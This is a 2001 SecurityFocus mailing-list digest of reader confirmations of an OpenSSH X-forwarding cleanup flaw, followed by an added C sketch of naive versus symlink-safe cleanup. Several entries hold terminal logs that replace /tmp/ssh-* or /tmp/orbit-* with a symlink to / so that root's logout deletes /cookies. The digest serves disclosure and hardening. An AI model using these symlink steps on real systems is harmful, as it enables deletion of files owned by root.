From: aleph1securityfocus.com
Date: Tue Jun 05 2001 - 12:30:37 CDT

    Tomas Ericsson <tematematik.su.se>

    The vulnerability works perfectly for me: sshd version OpenSSH_2.3.0 greenFreeBSD.org 20010321

    # uname -a
    FreeBSD myhost 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sun Apr 22 01:05:25 GMT 2001
    rootjkh101.osd.bsdi.com:/usr/src/sys/compile/GENERIC alpha

    [rootmyhost root]# echo "testing">/cookies
    [rootmyhost root]# ls -l /cookies
    -rw-r--r-- 1 root wheel 8 Jun 5 01:48 /cookies
    [rootmyhost root]# ssh -l te myhost
    [temyhost te]# rm -rf /tmp/ssh-1i24iea5
    [temyhost te]# ln -s / /tmp/ssh-1i24iea5
    [temyhost te]# logout
    [rootmyhost root]# ls -l /cookies
    ls: /cookies: No such file or directory

    Shannon Lee <shannonscatter.com>

    reproduced with OpenSSH_2.3.0p1 on redhat 6.2.

    TE <telinux.nu>

    This vulnerability works fine on both RedHat 7.1 & 7.0 with the latest
    updated packages from RedHat installed.

    RH71# uname -a
    Linux host1 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
    RH71# rpm -qa|grep openssh-server
    openssh-server-2.5.2p2-5

    RH70# uname -a
    Linux host2 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
    RH70# rpm -qa|grep openssh-server
    openssh-server-2.5.2p2-1.7.2

    "David Thiel" <dthielnexprise.com>

    I tested this on 4.3-RELEASE, and was successful.
    SSH Version OpenSSH_2.3.0 greenFreeBSD.org 20010321

    KF <dotslashsnosoft.com>

    Works on my box

    [rootbounce dotslash]# cat /etc/redhat-release
    Red Hat Linux release 7.0 (Guinness)
    rootbounce dotslash]# ssh -V
    SSH Version OpenSSH_2.1.1, protocol versions 1.5/2.0.
    Compiled with SSL (0x0090581f).

    Jan-Frode Myklebust <janfrodeparallab.uib.no>

    I just tested with OpenSSH_2.5.2p2 on RedHat 7.0,
    and OpenSSH_2.9p1 on IRIX 6.5 and both are
    vulnerable to this. I used protocol version 2 on
    both machines.

    Luciano Miguel Ferreira Rocha <strangensk.yi.org>

    Confirmed on RedHat 7.0 w/ OpenSSH 2.5.2p1. It needs, of course, to have
    X forwarding activated.

    "Golden_Eternity" <bhodibigfoot.com>

    I tried to reproduce this on a system running ssh 2.4.0, but I was unable to
    locate the /tmp/ssh-* directory.

    What version of ssh were you using when you discovered this?

    [testshiva test]$ ssh testlocalhost
    warning: Need basic cursor movement capablity, using vt100
    test's password:
    Authentication successful.
    Last login: Mon Jun 04 2001 10:42:08 -0700
    No mail.
    [testshiva test]$ ls -l /tmp/
    total 12
    drwxr-xr-x 2 root root 12288 Apr 8 11:59 lost+found
    [testshiva test]$

    "Schlosser, Matt D." <mschlossereschelon.com>

    On the contrary, it just takes another form:

    [rootbob /root]# touch /cookies;ls /cookies
    /cookies
    [rootbob /root]# ssh zenlocalhost
    zenlocalhost's password:
    [zenbob zen]$ rm -r /tmp/orbit-zen/; ln -s / /tmp/orbit-zen
    [zenbob zen]$ logout
    Connection to localhost closed.
    [rootbob /root]# ls /cookies
    /bin/ls: /cookies: No such file or directory

    -- 
    Elias Levy
    SecurityFocus.com
    http://www.securityfocus.com/
    Si vis pacem, para bellum
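
The sessions quoted above share one pattern: a cleanup that runs at logout removes a file named `cookies` under a `/tmp` path that the user was able to replace with a symlink. As an added example (not code from OpenSSH or from this message), the C sketch below contrasts that path-based cleanup with one that refuses a swapped directory; the function names and the `/tmp/cleanup-demo-*` fixture are assumptions constructed for illustration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Path-based cleanup: if dir is now a symlink, "<dir>/cookies" resolves in its target. */
int naive_cleanup(const char *dir)
{
    char path[4096];
    snprintf(path, sizeof path, "%s/cookies", dir);
    return unlink(path);
}

/* Hardened cleanup (hypothetical helper): 0 on success, -1 if dir is refused. */
int safe_cleanup(const char *dir, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW: open() fails if dir itself is a symlink. */
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0)
        return -1;
    /* Verify the opened handle, then unlink relative to it, not to the path. */
    int ok = fstat(dfd, &st) == 0 && st.st_uid == owner &&
             (unlinkat(dfd, "cookies", 0) == 0 || errno == ENOENT);
    close(dfd);
    return ok ? rmdir(dir) : -1;
}

/* Constructed fixture: a session directory swapped for a symlink to a directory
 * holding its own "cookies" file. Returns 1 if that file survives the cleanup. */
int victim_survives(int use_safe)
{
    char base[] = "/tmp/cleanup-demo-XXXXXX", target[64], sess[64], victim[80];
    if (!mkdtemp(base))
        return -1;
    snprintf(target, sizeof target, "%s/target", base);
    snprintf(sess, sizeof sess, "%s/ssh-demo", base);
    snprintf(victim, sizeof victim, "%s/cookies", target);
    int fd = mkdir(target, 0700) == 0 ? open(victim, O_CREAT | O_WRONLY, 0600) : -1;
    if (fd < 0 || close(fd) != 0 || symlink(target, sess) != 0)
        return -1;
    if (use_safe) safe_cleanup(sess, getuid()); else naive_cleanup(sess);
    int alive = access(victim, F_OK) == 0;
    unlink(victim); unlink(sess); rmdir(target); rmdir(base);
    return alive;
}
```

The final `rmdir(dir)` is still path-based, but `rmdir` on a symlink fails instead of following it. Running the cleanup with the logged-in user's privileges instead of root's limits the damage even where a path check is missed.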